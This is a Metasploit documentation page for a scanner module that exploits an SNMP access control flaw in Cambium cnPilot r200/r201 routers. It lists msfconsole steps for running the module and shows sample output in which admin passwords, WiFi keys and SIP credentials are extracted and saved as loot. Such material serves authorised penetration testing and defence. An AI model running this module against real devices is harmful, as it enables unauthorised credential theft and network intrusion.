documentation/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.md from rapid7/metasploit-framework

documentation/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.md

Summary

Maintainability

Test Coverage

Issues

Cambium cnPilot r200/r201 devices can be administered using SNMP. The device configuration contains IP addresses, keys, passwords, & lots of juicy information. This module exploits an access control flaw, which allows remotely extracting sensitive information such as account passwords, WiFI PSK, & SIP credentials via SNMP Read-Only (RO) community string.

## Verification Steps

1. Do: ```use auxiliary/scanner/snmp/cnpilot_r_snmp_loot```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set COMMUNITY public```
4. Do: ```run```

## Scenarios

  ```
msf > use auxiliary/scanner/snmp/cnpilot_r_snmp_loot
msf auxiliary(cnpilot_r_snmp_loot) > set rhosts 1.3.3.7
msf auxiliary(cnpilot_r_snmp_loot) > run

[+] 1.3.3.7, Connected.

[*] Fetching System Information...

[+] SNMP System Name: cnPilot R200P
[+] SNMP System Description: cnPilot R200P 4.3.1-R1
[+] Device UpTime: 666 days, 00:66:60.00
[+] Hardware version: V1.3
[+] Firmware version: 4.3.1-R1(201612201723)

[*] Fetching Login Account Information...

[+] Web Management Admin Login Name: admin
[+] Web Management Admin Login Password: S3cr3t

[*] Fetching SNMP Information...

[+] SNMP read-only community name: public
[+] SNMP read-write community name: private
[+] SNMP Trap Community: trap
[+] SNMP Trap Server IP Address:

[*] Fetching WIFI Information...

[+] Wireless Interface SSID: wifi_ssid
[+] Wireless Interface Encryption Key: wifi_secret_key
[+] Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): WPA2PSK

[*] Fetching SIP Account Information...

[+] SIP Account Number: 123456789
[+] SIP Account Password: 123456789

[+] Cambium cnPilot SNMP loot saved at /root/.msf4/loot/20000000000003_default_1.3.3.7_cambium_cnpilot__12345.txt

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

  ```